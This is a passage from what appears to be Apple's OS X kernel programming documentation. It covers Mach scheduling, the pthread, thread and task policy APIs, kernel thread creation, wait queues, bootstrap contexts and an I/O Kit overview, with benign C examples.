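For instance, example_align_up(4097, 4096) yields 8192, while an address that is already aligned, such as 4096, is returned unchanged. A size such as 24 fails the power-of-2 test and would not be a suitable argument.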
The function kmem_free is used to free an object allocated with one of the kmem_alloc functions. Unlike the standard C free function, kmem_free requires the length of the object. If you are not allocating fixed-size objects (for example, sizeof(struct foo)), you may have to do some additional bookkeeping, since you must free an entire object, not just a portion of one.

Mach Scheduling and Thread Interfaces

OS X is based on Mach and BSD. Like Mach and most BSD UNIX systems, it contains an advanced scheduler based on the CMU Mach 3 scheduler. This chapter describes the scheduler from the perspective of both a kernel programmer and an application developer attempting to set scheduling parameters.

This chapter begins with the “Overview of Scheduling” (page 77), which describes the basic concepts behind Mach scheduling at a high level, including real-time priority support.

The second section, “Using Mach Scheduling From User Applications” (page 79), describes how to access certain key Mach scheduler routines from user applications and from other parts of the kernel outside the scheduler.

The third section, “Kernel Thread APIs” (page 85), explains scheduler-related topics including how to create and terminate kernel threads and describes the BSD spl macros and their limited usefulness in OS X.

Overview of Scheduling

The OS X scheduler is derived from the scheduler used in OSFMK 7.3. In general, much documentation about prior implementations applies to the scheduler in OS X, although you will find numerous differences. The details of those differences are beyond the scope of this overview.

Mach scheduling is based on a system of run queues at various priorities that are handled in different ways. The priority levels are divided into four bands according to their characteristics, as described in Table 10-1 (page 77).
Table 10-1 Thread priority bands

Priority Band | Characteristics
Normal | normal application thread priorities
System high priority | threads whose priority has been raised above normal threads
Kernel mode only | reserved for threads created inside the kernel that need to run at a higher priority than all user space threads (I/O Kit workloops, for example)
Real-time threads | threads whose priority is based on getting a well-defined fraction of total clock cycles, regardless of other activity (in an audio player application, for example)

Threads can migrate between priority levels for a number of reasons, largely as an artifact of the time sharing algorithm used. However, this migration is within a given band.

Threads marked as being real-time priority are also special in the eyes of the scheduler. A real-time thread tells the scheduler that it needs to run for A cycles out of the next B cycles. For example, it might need to run for 3000 out of the next 7000 clock cycles in order to keep up. It also tells the scheduler whether those cycles must be contiguous. Using long contiguous quanta is generally frowned upon but is occasionally necessary for specialized real-time applications.

The kernel will make every effort to honor the request, but since this is soft real-time, it cannot be guaranteed. In particular, if the real-time thread requests something relatively reasonable, its priority will remain in the real-time band, but if it lies blatantly about its requirements and behaves in a compute-bound fashion, it may be demoted to the priority of a normal thread.

Changing a thread’s priority to turn it into a real-time priority thread using Mach calls is described in more detail in “Using Mach Scheduling From User Applications” (page 79).
In addition to the raw Mach RPC interfaces, some aspects of a thread’s priority can be controlled from user space using the POSIX thread priority API. The POSIX thread API is able to set thread priority only within the lowest priority band (0–63). For more information on the POSIX thread priority API, see “Using the pthreads API to Influence Scheduling” (page 79).

Why Did My Thread Priority Change?

There are many reasons that a thread’s priority can change. This section attempts to explain the root cause of these thread priority changes.

A real-time thread, as mentioned previously, is penalized (and may even be knocked down to normal thread priority) if it repeatedly exceeds its time quantum without blocking. For this reason, it is very important to make a reasonable guess about your thread’s workload if it needs to run in the real-time band.

Threads that are heavily compute-bound are given lower priority to help minimize response time for interactive tasks, so that high-priority compute-bound threads cannot monopolize the system and prevent lower-priority I/O-bound threads from running. Even at a lower priority, the compute-bound threads still run frequently, since the higher-priority I/O-bound threads do only a short amount of processing, block on I/O again, then allow the compute-bound threads to execute.

All of these mechanisms are operating continually in the Mach scheduler. This means that threads are frequently moving up or down in priority based upon their behavior and the behavior of other threads in the system.

Using Mach Scheduling From User Applications

There are three basic ways to change how a user thread is scheduled. You can use the BSD pthreads API to change basic policy and importance. You can also use Mach RPC calls to change a task’s importance.
Finally, you can use RPC calls to change the scheduling policy to move a thread into a different scheduling band. This is commonly used when interacting with CoreAudio.

The pthreads API is a user space API, and has limited relevance for kernel programmers. The Mach thread and task APIs are more general and can be used from anywhere in the kernel. The Mach thread and task calls can also be called from user applications.

Using the pthreads API to Influence Scheduling

OS X supports a number of policies at the POSIX threads API level. If you need real-time behavior, you must use the Mach thread_policy_set call. This is described in “Using the Mach Thread API to Influence Scheduling” (page 80).

The pthreads API adjusts the priority of threads within a given task. It does not necessarily impact performance relative to threads in other tasks. To increase the priority of a task, you can use nice or renice from the command line or call getpriority and setpriority from your application.

The API provides two functions: pthread_getschedparam and pthread_setschedparam. Their prototypes look like this:

    int pthread_setschedparam(pthread_t thread, int policy,
        const struct sched_param *param);
    int pthread_getschedparam(pthread_t thread, int *policy,
        struct sched_param *param);

The arguments for pthread_getschedparam are straightforward. The first argument is a thread ID, and the others are pointers to memory where the results will be stored.

The arguments to pthread_setschedparam are not as obvious, however. As with pthread_getschedparam, the first argument is a thread ID.

The second argument to pthread_setschedparam is the desired policy, which can currently be one of SCHED_FIFO (first in, first out), SCHED_RR (round-robin), or SCHED_OTHER. The SCHED_OTHER policy is generally used for extra policies that are specific to a given operating system, and should thus be avoided when writing portable code.

The third argument is a structure that contains various scheduling parameters.
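Before changing anything, it can help to read back the current settings. The following is a minimal sketch, assuming a POSIX system, that wraps pthread_getschedparam and checks a priority against the range reported by sched_get_priority_min and sched_get_priority_max (standard POSIX calls that this chapter does not otherwise cover). The functions whose names begin with example_ are hypothetical helpers written for this illustration.

```c
#include <assert.h>
#include <pthread.h>
#include <sched.h>
#include <stddef.h>

/*
 * Read the calling thread's current policy and priority.
 * Returns 0 on success or an error number, as pthread functions do.
 */
static int example_get_my_sched(int *policy, int *priority)
{
    struct sched_param sp;
    int err;

    assert(policy != NULL && priority != NULL);
    err = pthread_getschedparam(pthread_self(), policy, &sp);
    if (err != 0) {
        return err;
    }
    *priority = sp.sched_priority;
    return 0;
}

/* Nonzero if priority lies within the range the system reports for policy. */
static int example_priority_in_range(int policy, int priority)
{
    int lo = sched_get_priority_min(policy);
    int hi = sched_get_priority_max(policy);

    if (lo == -1 || hi == -1) {
        return 0; /* treated as failure: policy not recognized */
    }
    return priority >= lo && priority <= hi;
}
```

The valid priority range differs between policies and between operating systems, so a value passed to pthread_setschedparam is best checked against the reported range rather than hard-coded.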
Here is a basic example of using pthreads functions to set a thread’s scheduling policy and priority.

    #include <pthread.h>
    #include <stdio.h>
    #include <string.h>

    int set_my_thread_priority(int priority)
    {
        struct sched_param sp;

        memset(&sp, 0, sizeof(struct sched_param));
        sp.sched_priority = priority;
        /* pthread functions return an error number on failure, not -1. */
        if (pthread_setschedparam(pthread_self(), SCHED_RR, &sp) != 0) {
            printf("Failed to change priority.\n");
            return -1;
        }
        return 0;
    }

This code snippet sets the scheduling policy for the current thread to round-robin scheduling, and sets the thread’s relative importance within the task to the value passed in through the priority argument.

For more information, see the manual page for pthread.

Using the Mach Thread API to Influence Scheduling

This API is frequently used in multimedia applications to obtain real-time priority. It is also useful in other situations when the pthread scheduling API cannot be used or does not provide the needed functionality.

The API consists of two functions, thread_policy_set and thread_policy_get.

    kern_return_t thread_policy_set(
        thread_act_t thread,
        thread_policy_flavor_t flavor,
        thread_policy_t policy_info,
        mach_msg_type_number_t count);

    kern_return_t thread_policy_get(
        thread_act_t thread,
        thread_policy_flavor_t flavor,
        thread_policy_t policy_info,
        mach_msg_type_number_t *count,
        boolean_t *get_default);

The parameters of these functions are roughly the same, except that the thread_policy_get function takes pointers for the count and the get_default arguments.
The count is an inout parameter, meaning that it is interpreted as the maximum amount of storage (in units of int32_t) that the calling task has allocated for the return, but it is also overwritten by the scheduler to indicate the amount of data that was actually returned.

These functions get and set several parameters, according to the thread policy chosen. The possible thread policies are listed in Table 10-2 (page 81).

Table 10-2 Thread policies

Policy | Meaning
THREAD_STANDARD_POLICY | Default value
THREAD_TIME_CONSTRAINT_POLICY | Used to specify real-time behavior.
THREAD_PRECEDENCE_POLICY | Used to indicate the importance of computation relative to other threads in a given task.

The following code snippet shows how to set the policy of a thread to tell the scheduler that it needs real-time performance. The example values provided in comments are based on the estimated needs of esd (the Esound daemon).

    #include <mach/mach.h>
    #include <mach/thread_policy.h>
    #include <pthread.h>
    #include <stdio.h>

    int set_realtime(int period, int computation, int constraint)
    {
        struct thread_time_constraint_policy ttcpolicy;
        int ret;
        thread_port_t threadport = pthread_mach_thread_np(pthread_self());

        ttcpolicy.period = period;           // HZ/160
        ttcpolicy.computation = computation; // HZ/3300;
        ttcpolicy.constraint = constraint;   // HZ/2200;
        ttcpolicy.preemptible = 1;

        if ((ret = thread_policy_set(threadport,
                THREAD_TIME_CONSTRAINT_POLICY, (thread_policy_t)&ttcpolicy,
                THREAD_TIME_CONSTRAINT_POLICY_COUNT)) != KERN_SUCCESS) {
            fprintf(stderr, "set_realtime() failed.\n");
            return 0;
        }
        return 1;
    }

The time values are in terms of Mach absolute time units. Since these values differ on different CPUs, you should generally use numbers relative to HZ (a global variable in the kernel that contains the current number of ticks per second).
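As a rough worked example of the HZ-relative values suggested in the comments of set_realtime, the following sketch derives the three time fields from a tick rate. The struct and function names are hypothetical and exist only for this illustration. The consistency check encodes just one basic expectation, that the computation time fits within the constraint; it is not a statement of everything the scheduler validates.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical container mirroring the three time fields used above. */
struct example_rt_params {
    uint32_t period;      /* ticks between activations */
    uint32_t computation; /* ticks of CPU time needed in each period */
    uint32_t constraint;  /* maximum ticks from start to end of computation */
};

/* Derive the example values from a tick rate, using the divisors
 * given in the comments of set_realtime (160, 3300, and 2200). */
static struct example_rt_params example_rt_from_hz(uint32_t hz)
{
    struct example_rt_params p;

    assert(hz > 0);
    p.period = hz / 160;
    p.computation = hz / 3300;
    p.constraint = hz / 2200;
    return p;
}

/* Basic sanity check: the computation must fit within the constraint. */
static int example_rt_is_consistent(const struct example_rt_params *p)
{
    assert(p != 0);
    return p->computation <= p->constraint;
}
```

For a tick rate of exactly 133,000,000, integer division gives a period of 831,250 ticks, a computation of 40,303 ticks, and a constraint of 60,454 ticks, and the consistency check passes.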
You can either handle this conversion yourself by dividing HZ by an appropriate quantity or use the conversion routines described in “Using Kernel Time Abstractions” (page 142).

Say your computer reports 133 million for the value of HZ. If you pass the example values given as arguments to this function, your thread tells the scheduler that it needs approximately 40,000 (HZ/3300) out of the next 831,000 or so (HZ/160) bus cycles. The preemptible value (1) indicates that those 40,000 bus cycles need not be contiguous. However, the constraint value (HZ/2200) tells the scheduler that there can be no more than about 60,000 bus cycles between the start of computation and the end of computation.

Note: Because the constraint sets a maximum bound for computation, it must be larger than the value for computation.

A straightforward example using this API is code that displays video directly to the framebuffer hardware. It needs to run for a certain number of cycles every frame to get the new data into the frame buffer. It can be interrupted without worry, but if it is interrupted for too long, the video hardware starts displaying an outdated frame before the software writes the updated data, resulting in a nasty glitch. Audio has similar behavior, but since it is usually buffered along the way (in hardware and in software), there is greater tolerance for variations in timing, to a point.

Another policy is THREAD_PRECEDENCE_POLICY. This is used for setting the relative importance of non-real-time threads. Its calling convention is similar, except that its structure is thread_precedence_policy, and contains only one field, an integer_t called importance. While this is a signed 32-bit value, the minimum legal value is zero (IDLE_PRI). Threads set to IDLE_PRI will only execute when no other thread is scheduled to execute.
In general, larger values indicate higher priority. The maximum limit is subject to change, as are the priority bands, some of which have special purposes (such as real-time threads). Thus, in general, you should use pthreads APIs to achieve this functionality rather than using this policy directly unless you are setting up an idle thread.

Using the Mach Task API to Influence Scheduling

This relatively simple API is not particularly useful for most developers. However, it may be beneficial if you are developing a graphical user interface for Darwin. It also provides some insight into the prioritization of tasks in OS X. It is presented here for completeness.

The API consists of two functions, task_policy_set and task_policy_get.

    kern_return_t task_policy_set(
        task_t task,
        task_policy_flavor_t flavor,
        task_policy_t policy_info,
        mach_msg_type_number_t count);

    kern_return_t task_policy_get(
        task_t task,
        task_policy_flavor_t flavor,
        task_policy_t policy_info,
        mach_msg_type_number_t *count,
        boolean_t *get_default);

As with thread_policy_set and thread_policy_get, the two functions take similar parameters, except that task_policy_get takes pointers for the count and get_default arguments. The count argument is an inout parameter. It is interpreted as the maximum amount of storage that the calling task has allocated for the return, but it is also overwritten by the scheduler to indicate the amount of data that was actually returned.

These functions get and set a single parameter, the role of a given task, which changes the way the task’s priority gets altered over time. The possible roles of a task are listed in Table 10-3 (page 83).

Table 10-3 Task roles

Role                           Meaning
TASK_UNSPECIFIED               Default value
TASK_RENICED                   This is set when a process is executed with nice or is modified by renice.
TASK_FOREGROUND_APPLICATION    GUI application in the foreground. There can be more than one foreground application.
TASK_BACKGROUND_APPLICATION    GUI application in the background.
TASK_CONTROL_APPLICATION       Reserved for the dock or equivalent (assigned FCFS).
TASK_GRAPHICS_SERVER           Reserved for WindowServer or equivalent (assigned FCFS).

The following code snippet shows how to set the role of a task to tell the scheduler that it is a foreground application (regardless of whether it really is).

    /* Headers required by the calls below. */
    #include <mach/mach.h>
    #include <mach/task_policy.h>
    #include <stdio.h>

    /* Returns 1 on success, 0 on failure. */
    int set_my_task_policy(void) {
        int ret;
        struct task_category_policy tcatpolicy;

        tcatpolicy.role = TASK_FOREGROUND_APPLICATION;

        if ((ret = task_policy_set(mach_task_self(),
                TASK_CATEGORY_POLICY, (task_policy_t)&tcatpolicy,
                TASK_CATEGORY_POLICY_COUNT)) != KERN_SUCCESS) {
            fprintf(stderr, "set_my_task_policy() failed.\n");
            return 0;
        }
        return 1;
    }

Kernel Thread APIs

The OS X scheduler provides a number of public APIs. While many of these APIs should not be used, the APIs to create, destroy, and alter kernel threads are of particular importance. While not technically part of the scheduler itself, they are inextricably tied to it.

The scheduler directly provides certain services that are commonly associated with the use of kernel threads, without which kernel threads would be of limited utility. For example, the scheduler provides support for wait queues, which are used in various synchronization primitives such as mutex locks and semaphores.

Creating and Destroying Kernel Threads

The recommended interface for creating threads within the kernel is through the I/O Kit. It provides IOCreateThread, IOThreadSelf, and IOExitThread functions that make it relatively painless to create threads in the kernel.
The basic functions for creating and terminating kernel threads are:

    IOThread IOCreateThread(IOThreadFunc function, void *argument);
    IOThread IOThreadSelf(void);
    void IOExitThread(void);

With the exception of IOCreateThread (which is a bit more complex), the I/O Kit functions are fairly thin wrappers around Mach thread functions. The types involved are also very thin abstractions. IOThread is really the same as thread_t.

The IOCreateThread function creates a new thread that immediately begins executing the function that you specify. It passes a single argument to that function. If you need to pass more than one argument, you should dynamically allocate a data structure and pass a pointer to that structure.

For example, the following code creates a kernel thread and executes the function myfunc in that thread:

    #include <IOKit/IOLib.h>
    #include <libkern/libkern.h>
    #include <sys/malloc.h>

    struct mydata {
        int three;
        char *string;
    };

    /* Thread entry point; receives the pointer passed to IOCreateThread. */
    static void myfunc(void *myarg) {
        struct mydata *md = (struct mydata *)myarg;
        IOLog("Passed %d = %s\n", md->three, md->string);
        IOExitThread();
    }

    void start_threads() {
        IOThread mythread;
        /* Bundle the arguments in a dynamically allocated structure. */
        struct mydata *md = (struct mydata *)malloc(sizeof(*md));
        md->three = 3;
        md->string = (char *)malloc(2 * sizeof(char));
        md->string[0] = '3';
        md->string[1] = '\0';

        // Start a thread using IOCreateThread
        mythread = IOCreateThread(&myfunc, (void *)md);
    }

One other useful function is thread_terminate. This can be used to destroy an arbitrary thread (except, of course, the currently running thread). This can be extremely dangerous if not done correctly. Before tearing down a thread with thread_terminate, you should lock the thread and disable any outstanding timers against it. If you fail to deactivate a timer, a kernel panic will occur when the timer expires.
With that in mind, you may be able to terminate a thread as follows:

    thread_terminate(getact_thread(thread));

Here, thread is of type thread_t. In general, you can only be assured that you can kill yourself, not other threads in the system. The function thread_terminate takes a single parameter of type thread_act_t (a thread activation). The function getact_thread takes a thread shuttle (thread_shuttle_t) or thread_t and returns the thread activation associated with it.

SPL and Friends

BSD-based and Mach-based operating systems contain legacy functions designed for basic single-processor synchronization. These include splhigh, splbio, splx, and other similar functions. Because these functions are not particularly useful for synchronization in an SMP situation, they are not particularly useful as synchronization tools in OS X.

If you are porting legacy code from earlier Mach-based or BSD-based operating systems, you must find an alternate means of providing synchronization. In many cases, this is as simple as taking the kernel or network funnel. In parts of the kernel, the use of spl functions does nothing, but causes no harm if you are holding a funnel (and results in a panic if you are not). In other parts of the kernel, spl macros are actually used. Because spl cannot necessarily be used for its intended purpose, it should not be used in general unless you are writing code in a part of the kernel that already uses it. You should instead use alternate synchronization primitives such as those described in “Synchronization Primitives” (page 128).

Wait Queues and Wait Primitives

The wait queue API is used extensively by the scheduler and is closely tied to the scheduler in its implementation. It is also used extensively in locks, semaphores, and other synchronization primitives.
The wait queue API is both powerful and flexible, and as a result is somewhat large. Not all of the API is exported outside the scheduler, and parts are not useful outside the context of the wait queue functions themselves. This section documents only the public API.

The wait queue API includes the following functions:

    void wait_queue_init(wait_queue_t wq, int policy);
    extern wait_queue_t wait_queue_alloc(int policy);
    void wait_queue_free(wait_queue_t wq);
    void wait_queue_lock(wait_queue_t wq);
    void wait_queue_lock_try(wait_queue_t wq);
    void wait_queue_unlock(wait_queue_t wq);
    boolean_t wait_queue_member(wait_queue_t wq, wait_queue_sub_t wq_sub);
    boolean_t wait_queue_member_locked(wait_queue_t wq, wait_queue_sub_t wq_sub);
    kern_return_t wait_queue_link(wait_queue_t wq, wait_queue_sub_t wq_sub);
    kern_return_t wait_queue_unlink(wait_queue_t wq, wait_queue_sub_t wq_sub);
    kern_return_t wait_queue_unlink_one(wait_queue_t wq, wait_queue_sub_t *wq_subp);
    void wait_queue_assert_wait(wait_queue_t wq, event_t event, int interruptible);
    void wait_queue_assert_wait_locked(wait_queue_t wq, event_t event,
        int interruptible, boolean_t unlocked);
    kern_return_t wait_queue_wakeup_all(wait_queue_t wq, event_t event, int result);
    kern_return_t wait_queue_peek_locked(wait_queue_t wq, event_t event,
        thread_t *tp, wait_queue_t *wqp);
    void wait_queue_pull_thread_locked(wait_queue_t wq, thread_t thread,
        boolean_t unlock);
    thread_t wait_queue_wakeup_identity_locked(wait_queue_t wq, event_t event,
        int result, boolean_t unlock);
    kern_return_t wait_queue_wakeup_one(wait_queue_t wq, event_t event, int result);
    kern_return_t wait_queue_wakeup_one_locked(wait_queue_t wq, event_t event,
        int result, boolean_t unlock);
    kern_return_t wait_queue_wakeup_thread(wait_queue_t wq, event_t event,
        thread_t thread, int result);
    kern_return_t wait_queue_wakeup_thread_locked(wait_queue_t wq, event_t event,
        thread_t thread, int result, boolean_t unlock);
    kern_return_t wait_queue_remove(thread_t thread);

Most of the functions and their arguments are straightforward and are not presented in detail. However, a few require special attention.

Most of the functions take an event_t as an argument. These can be arbitrary 32-bit values, which leads to the potential for conflicting events on certain wait queues. The traditional way to avoid this problem is to use the address of a data object that is somehow related to the code in question as that 32-bit integer value.

For example, if you are waiting for an event that indicates that a new block of data has been added to a ring buffer, and if that ring buffer’s head pointer was called rb_head, you might pass the value &rb_head as the event ID. Because wait queue usage does not generally cross address space boundaries, this is generally sufficient to avoid any event ID conflicts.

Notice the functions ending in _locked. These functions require that your thread be holding a lock on the wait queue before they are called. Functions ending in _locked are equivalent to their nonlocked counterparts (where applicable) except that they do not lock the queue on entry and may not unlock the queue on exit (depending on the value of unlock). The remainder of this section does not differentiate between locked and unlocked functions.
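The event-ID convention described above can be illustrated without the kernel. The following single-threaded sketch models a wait queue as an array of (waiter, event) records and shows that using the address of a related object, such as &rb_head, keeps unrelated waiters from sharing an event. Everything in it (toy_wait_queue, toy_assert_wait, toy_wakeup_all) is a hypothetical model written for this example. It is not the kernel wait queue API, and it does not block or schedule anything.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_MAX_WAITERS 8

/* One record per waiting "thread": who waits, and on which event. */
struct toy_waiter {
    int         thread_id;
    const void *event;     /* event ID: the address of a related object */
    int         waiting;   /* 1 while asleep, 0 once awakened */
};

struct toy_wait_queue {
    struct toy_waiter waiters[TOY_MAX_WAITERS];
    size_t            count;
};

/* Record that thread_id waits for event.
 * Returns 0 on success, -1 if the queue is full. */
int toy_assert_wait(struct toy_wait_queue *wq, int thread_id, const void *event)
{
    assert(wq != NULL);
    if (wq->count == TOY_MAX_WAITERS)
        return -1;
    wq->waiters[wq->count].thread_id = thread_id;
    wq->waiters[wq->count].event = event;
    wq->waiters[wq->count].waiting = 1;
    wq->count++;
    return 0;
}

/* Wake every waiter whose event matches.
 * Returns the number of waiters awakened. */
int toy_wakeup_all(struct toy_wait_queue *wq, const void *event)
{
    int woken = 0;

    assert(wq != NULL);
    for (size_t i = 0; i < wq->count; i++) {
        if (wq->waiters[i].waiting && wq->waiters[i].event == event) {
            wq->waiters[i].waiting = 0;
            woken++;
        }
    }
    return woken;
}
```

In this model, two waiters registered on &rb_head are both awakened by toy_wakeup_all(&wq, &rb_head), while a waiter registered on the address of an unrelated object stays asleep. Two distinct objects in the same address space never share an address, which is why the convention avoids event ID conflicts.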
The wait_queue_alloc and wait_queue_init functions take a policy parameter, which can be one of the following:

● SYNC_POLICY_FIFO: first-in, first-out
● SYNC_POLICY_FIXED_PRIORITY: policy based on thread priority
● SYNC_POLICY_PREPOST: keep track of the number of wakeups where no thread was waiting, and allow threads to immediately continue executing without waiting until that count reaches zero. This is frequently used when implementing semaphores.

You should not use the wait_queue_init function outside the scheduler. Because a wait queue is an opaque object outside that context, you cannot determine the appropriate size for allocation. Thus, because the size could change in the future, you should always use wait_queue_alloc and wait_queue_free unless you are writing code within the scheduler itself.

Similarly, the functions wait_queue_member, wait_queue_member_locked, wait_queue_link, wait_queue_unlink, and wait_queue_unlink_one are operations on subordinate queues, which are not exported outside the scheduler.

The function wait_queue_member determines whether a subordinate queue is a member of a queue.

The functions wait_queue_link and wait_queue_unlink link and unlink a given subordinate queue from its parent queue, respectively.

The function wait_queue_unlink_one unlinks the first subordinate queue in a given parent and returns it.

The function wait_queue_assert_wait causes the calling thread to wait on the wait queue until it is either interrupted (by a thread timer, for example) or explicitly awakened by another thread. The interruptible flag indicates whether this function should allow an asynchronous event to interrupt waiting.

The function wait_queue_wakeup_all wakes up all threads waiting on a given queue for a particular event.

The function wait_queue_peek_locked returns the first thread from a given wait queue that is waiting on a given event.
It does not remove the thread from the queue, nor does it wake the thread. It also returns the wait queue where the thread was found. If the thread is found in a subordinate queue, other subordinate queues are unlocked, as is the parent queue. Only the queue where the thread was found remains locked.

The function wait_queue_pull_thread_locked pulls a thread from the wait queue and optionally unlocks the queue. This is generally used with the result of a previous call to wait_queue_peek_locked.

The function wait_queue_wakeup_identity_locked wakes up the first thread that is waiting for a given event on a given wait queue and starts it running but leaves the thread locked. It then returns a pointer to the thread. This can be used to wake the first thread in a queue and then modify unrelated structures based on which thread was actually awakened before allowing the thread to execute.

The function wait_queue_wakeup_one wakes up the first thread that is waiting for a given event on a given wait queue.

The function wait_queue_wakeup_thread wakes up a given thread if and only if it is waiting on the specified event and wait queue (or one of its subordinates).

The function wait_queue_remove wakes a given thread without regard to the wait queue or event on which it is waiting.

Bootstrap Contexts

In OS X kernel programming, the term context has several meanings that appear similar on the surface, but differ subtly.

First, the term context can refer to a BSD process or Mach task. Switching from one process to another is often referred to as a context switch.

Second, context can refer to the part of the operating system in which your code resides.
Examples of this include thread contexts, the interrupt context, the kernel context, an application’s context, a Carbon File Manager context, and so on. Even for this use of the term, the exact meaning depends, ironically, on the context in which the term is used.

Finally, context can refer to a bootstrap context. In Mach, the bootstrap task is assigned responsibility for looking up requests for Mach ports. As part of this effort, each Mach task is registered in one of two groups: either in the startup context or in a user’s login context. (In theory, Mach can support any number of independent contexts; however, the use of additional contexts is beyond the scope of this document.)

For the purposes of this chapter, the term context refers to a bootstrap context.

When OS X first boots, there is only the top-level context, which is generally referred to as the startup context. All other contexts are subsets of this context. Basic system services that rely on Mach ports must be started in this context in order to work properly.

When a user logs in, the bootstrap task creates a new context called the login context. Programs run by the user are started in the login context. This allows the user to run a program that provides an alternate port lookup mechanism if desired, causing that user’s tasks to get a different port when the tasks look up a basic service. This has the effect of replacing that service with a user-defined version in a way that changes what the user’s tasks see, but does not affect any of the rest of the system.

To avoid wasting memory, currently the login context is destroyed when the user logs out (or shortly thereafter). This behavior may change in the future, however. In the current implementation, programs started by the user will no longer be able to look up Mach ports after logout. If a program does not need to do any port lookup, it will not be affected. Other programs will terminate, hang, or behave erratically.
For example, in Mac OS X v10.1 and earlier, sshd continues to function when started from a user context. However, since it is unable to communicate with lookupd or netinfo, it stops accepting passwords. This is not a particularly useful behavior.

Other programs such as esound, however, continue to work correctly after logout when started from a user context. Other programs behave correctly in their default configuration but fail in other configurations, for example, when authentication support is enabled.

There are no hard and fast rules for which programs will continue to operate after their bootstrap context is destroyed. Only thorough testing can tell you whether any given program will misbehave if started from a user context, since even programs that do not appear to directly use Mach communication may still do so indirectly.

In OS X v10.2, a great deal of effort has gone into making sure that programs that use only standard BSD services and functions do not use Mach lookups in a way that would fail if started from a user context. If you find an application that breaks when started from a Terminal.app window, please file a bug report.

How Contexts Affect Users

From the perspective of a user, contexts are generally unimportant as long as the user does not want a program to survive past the end of the login session.

Contexts do become a problem for the administrator, however. For example, if the administrator upgrades sshd by killing the old version, starting the new one, and logging out, strange things could happen since the context in which sshd was running no longer exists.

Contexts also pose an issue for users running background jobs with nohup or users detaching terminal sessions using screen. There are times when it is perfectly reasonable for a program to survive past logout, but by default, this does not occur.

There are three basic ways that a user can get around this.
In the case of daemons, they can modify the startup scripts to start the application. On restart, the application will be started in the startup context. This is not very practical if the computer in question is in heavy use, however. Fortunately, there are other ways to start services in a startup context.

The second way to run a service in the startup context is to use ssh to connect to the computer. Since sshd is running in the startup context, programs started from an ssh session also register themselves in the startup context. (Note that a user can safely kill the main sshd process without being logged out. The user just needs to be careful to kill the right one.)

The third way is to log in as the console user (>console), which causes LoginWindow to exit and causes init to spawn a getty process on the console. Since init spawns getty, which spawns login, which spawns the user’s shell, any programs started from the text console will be in the startup context.

More generally, any process that is the child of a process in the startup context (other than those inherited by init because their parent process exited) is automatically in the startup context. Any process that is the child of a process in the login context is, itself, in the login context. This means that daemons can safely fork children at any time and those children will be in the startup context, as will programs started from the console (not the Console application). This also means that any program started by a user in a terminal window, from Finder, from the Dock, and so on, will be in the currently logged in user’s login context, even if that user runs the application using su or sudo.

How Contexts Affect Developers

If you are writing only kernel code, contexts are largely irrelevant (unless you are creating a new context, of course).
However, kernel developers frequently need to write a program that registers itself in the startup context in order to provide some level of driver communication. For example, you could write a user-space daemon that brokers configuration information for a sound driver based on which user is logged in at the time.

In the most general case, the problem of starting an application in the startup context can be solved by creating a startup script for your daemon, which causes it to be run in the startup context after the next reboot. However, users generally do not appreciate having to reboot their computers to install a new driver. Asking the user to connect to his or her own computer with ssh to execute a script is probably not reasonable, either.

The biggest problem with forcing a reboot, of course, is that users often install several programs at once. Rebooting between each install inconveniences the end user, and has no other benefit. For that reason, you should not force the user to restart. Instead, you should offer the user the option, noting that the software may not work correctly until the user restarts. While this does not solve the fundamental problem, it does at least minimize the most common source of complaints.

There are a number of ways to force a program to start in the startup context without rebooting or using ssh. However, these are not robust solutions, and are not recommended. A standard API for starting daemons is under consideration. When an official API becomes available, this chapter will be updated to discuss it.

I/O Kit Overview

Those of you who are already familiar with writing device drivers for Mac OS 9 or for BSD will discover that writing drivers for OS X requires some new ways of thinking.
In creating OS X, Apple has completely redesigned the Macintosh I/O architecture, providing a framework for simplified driver development that supports many categories of devices. This framework is called the I/O Kit.

From a programming perspective, the I/O Kit provides an abstract view of the system hardware to the upper layers of OS X. The I/O Kit uses an object-oriented programming model, implemented in a restricted subset of C++ to promote increased code reuse.

By starting with properly designed base classes, you gain a head start in writing a new driver; with much of the driver code already written, you need only to fill in the specific code that makes your driver different. For example, all SCSI controllers deliver a fairly standard set of commands to a device, but do so via different low-level mechanisms. By properly using object-oriented programming methodology, a SCSI driver can implement those low-level transport portions without reimplementing the higher level SCSI protocol code. Similar opportunities for code reuse can be found in most types of drivers.

Part of the philosophy of the I/O Kit is to make the design completely open. Rather than hiding parts of the API in an attempt to protect developers from themselves, all of the I/O Kit source is available as part of Darwin. You can use the source code as an aid to designing (and debugging) new drivers.

Instead of hiding the interfaces, Apple’s designers have chosen to lead by example. Sample code and classes show the recommended (easy) way to write a driver. However, you are not prevented from doing things the hard way (or the wrong way). Instead, attention has been concentrated on making the “best” ways easy to follow.

Redesigning the I/O Model

You might ask why Apple chose to redesign the I/O model. At first glance, it might seem that reusing the model from Mac OS 9 or FreeBSD would have been an easier choice. There are several reasons for the decision, however.

Neither the Mac OS 9 driver model nor the FreeBSD model offered a feature set rich enough to meet the needs of OS X. The underlying operating-system technology of OS X is very different from that of Mac OS 9. The OS X kernel is significantly more advanced than the previous Mac OS system architecture; OS X needs to handle memory protection, preemption, multiprocessing, and other features not present (or substantially less pervasive) in previous versions of the Mac OS.

Although FreeBSD supports these features, the BSD driver model did not offer the automatic configuration, stacking, power management, or dynamic device-loading features required in a modern, consumer-oriented operating system.

By redesigning the I/O architecture, Apple’s engineers can take best advantage of the operating-system features in OS X. For example, virtual memory (VM) is not a fundamental part of the operating system in Mac OS 9. Thus, every driver writer must know about (and write for) VM. This has presented certain complications for developers. In contrast, OS X has simplified driver interaction with VM. VM capability is inherent in the OS X operating system and cannot be turned off by the user. Thus, VM capabilities can be abstracted into the I/O Kit, and the code for handling VM need not be written for every driver.

OS X offers an unprecedented opportunity to reuse code. In Mac OS 9, for example, all software development kits (SDKs) were independent of each other, duplicating functionality between them. In OS X, the I/O Kit is delivered as part of the basic developer tools, and code is shared among its various parts.

In contrast with traditional I/O models, the reusable code model provided by the I/O Kit can decrease your development work substantially. In porting drivers from Mac OS 9, for example, the OS X counterparts have been up to 75% smaller.

In general, all hardware support is provided directly by I/O Kit entities.
One exception to this rule is imaging devices such as printers, scanners, and digital cameras (although these do make some use of I/O Kit functionality). Specifically, although communication with these devices is handled by the I/O Kit (for instance, under the FireWire or USB families), support for particular device characteristics is handled by user-space code (see “For More Information” (page 100) for further discussion). If you need to support imaging devices, you should employ the appropriate imaging software development kit (SDK).

